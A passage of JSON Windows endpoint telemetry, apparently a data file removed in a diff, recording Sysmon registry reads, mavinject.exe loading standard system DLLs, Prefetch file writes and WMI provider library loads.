"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": 
"C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 
131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - 
"unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": 
"{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "process", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "subtype": "terminate", - "timestamp": 131883573571040000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "file", - "file_name": "MAVINJECT.EXE-B106A478.pf", - "file_path": "C:\\Windows\\Prefetch\\MAVINJECT.EXE-B106A478.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573571200016, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "WMIAPSRV.EXE-576286C3.pf", - "file_path": "C:\\Windows\\Prefetch\\WMIAPSRV.EXE-576286C3.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573582140000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "WMIPRVSE.EXE-43972D0F.pf", - "file_path": "C:\\Windows\\Prefetch\\WMIPRVSE.EXE-43972D0F.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573589960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - 
"pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883573600110000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883573600110000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 
131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "image_load", - "image_name": "Wldap32.dll", - "image_path": "C:\\Windows\\System32\\Wldap32.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "FirewallAPI.dll", - "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - 
"unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "ntdsapi.dll", - "image_path": "C:\\Windows\\System32\\ntdsapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "mi.dll", - "image_path": "C:\\Windows\\System32\\mi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "miutils.dll", - "image_path": "C:\\Windows\\System32\\miutils.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "fwbase.dll", - "image_path": "C:\\Windows\\System32\\fwbase.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", 
- "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788700016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wfascim.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wfascim.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wbemprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
